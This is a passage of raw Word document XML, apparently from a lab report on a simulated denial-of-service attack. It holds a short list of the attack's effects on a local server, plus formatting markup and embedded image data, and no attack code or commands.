        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>flooding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>traffic,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simulating real-world DoS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C357FA" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12E870" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="244" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>becomes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>unresponsive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BE9A1" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="245" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>attempting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encounter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>delays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEE9043" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="245" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>filled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>volume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>fake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>requests,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>making</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4421652F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487592448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25FFD431" wp14:editId="627C1498">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>155286</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2296160" cy="91186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6160" cy="911860"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2296160" cy="911860"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="32" name="Image 32"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9588"/>
                            <a:ext cx="2277110" cy="892784"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="33" name="Graphic 33"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="2286635" cy="902335"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2286635" h="902335">
                                <a:moveTo>
                                  <a:pt x="0" y="902309"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2286635" y="902309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2286635" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90230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989C45F" id="Group 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.75pt;margin-top:12.25pt;width:180.8pt;height:71.8pt;z-index:-15724032;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="22961,91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lTYBqAwAAZAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbW/bIBD+Pmn/&#10;Afl767y0ebGaVFOzRpWqrlo77TPB2EbFwIC8/fvdYZykSbd1jRT7CMfx8NxzR66uN7UkK26d0GqS&#10;dM87CeGK6VyocpL8eL49GyXEeapyKrXik2TLXXI9/fzpam0y3tOVljm3BIIol63NJKm8N1maOlbx&#10;mrpzbbiCyULbmnoY2jLNLV1D9FqmvU5nkK61zY3VjDsHv86ayWQa4hcFZ/5bUTjuiZwkgM2Hpw3P&#10;BT7T6RXNSktNJViEQT+AoqZCwaa7UDPqKVlacRKqFsxqpwt/znSd6qIQjIczwGm6naPTzK1emnCW&#10;MluXZkcTUHvE04fDsofV3Jon82gb9GDea/bigJd0bcrscB7H5d55U9gaF8EhyCYwut0xyjeeMPix&#10;1xsPugMgnsHcuNsdgR0oZxXk5WQZq77+fWFKs2bbAG4HxgiWwTcSBNYJQf8WEqzyS8uTGKR+V4ya&#10;2pelOYNcGurFQkjht0GXkDUEpVaPgiG3OAAuHy0R+STp9xKiaA31cFfTkhMYAyutD65A/k8CLKQw&#10;t0JKZB3tCBXkfCSHN07bSG2m2bLmyje1Y7kE1Fq5ShiXEJvxesEBnr3Lu5AyqFsPEI0VyjdZc95y&#10;zyrcvwAc36G8ECjNdhMB9B4nHsFFcR3pZXzZu0wIyuJyNGrC71UzHHa7UTWjcW84ukCHXfJpZqzz&#10;c65rggYABiDAOM3o6t5FSK1LJLJBEeABKOwP0HBcSyGMTkj8r5p6qqjhAAHDHuS53+Z5HltMv48n&#10;iV5YdnH0B5IuhgOQCpAUDPCl2Z6k0WDQBwpDaXV6fbBfk8SWDUmHxECHyhuKgKyqtdhGtSZSic1S&#10;hmbpQRVAb0KgWS4wPFBPPa5rTbLGKo9QKshmgwSna73izzo4+n2po0NnHKHuXaQ6dN1FRH0cLmjd&#10;2rcJkQ/dQ4MBqbQe7bvxBFFByPf4vLktk9rxhmXkIWhyRwhseki5VMhNkDly4LQUeVu9zpaLG2nJ&#10;iuK9FD6RkVduqOEZdVXjF6aim1SwN8qoEQ5aC51vob+sQWmTxP1aUmxm8k6BsvHmaw3bGovWsF7e&#10;6HA/hlzBns+bn9SaWFweFPegW4Gf1FjjiyuV/rL0uhChAPeIIlAotmCFqywQF69dvCsPx8Fr/+dg&#10;+hsAAP//AwBQSwMECgAAAAAAAAAhALHKCpUkKwAAJCsAABUAAABkcnMvbWVkaWEvaW1hZ2UxLmpw&#10;ZWf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwM&#10;CwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEIAHoBN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hm&#10;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&#10;8vpUJYkAHtTjIxGM8UAhtPjb5WGB0PNM3HBH